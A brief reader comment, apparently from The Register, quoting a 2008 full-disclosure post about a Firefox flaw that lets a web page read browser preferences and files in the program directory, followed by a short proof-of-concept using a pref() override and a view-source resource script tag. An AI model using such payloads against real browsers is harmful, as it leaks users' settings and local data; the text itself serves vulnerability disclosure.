image
“don’t patch vulnerabilities for fifty percent, take the time and fix the cause. Because directory traversal through plugins is all nice and such, we don’t need it. We can trick Firefox itself in traversing directories back. I found another information leak that is very serious because we are able to read out all preferences set in Firefox, or just open or include about every file stored in the Mozilla program files directory, and this without any mandatory settings or plugins.”

http://lists.grok.org.uk/pipermail/full-disclosure/2008-February/060156.html

pref = function(a,b) {
document.write( a + ‘ -> ‘ + b + ‘<br />’);
};
</script>
<script src=”view-source:resource:///greprefs/all.js”>
</script>

Source: Comments on ‘Firefox updates, blitzes trio of critical bugs’ | The Register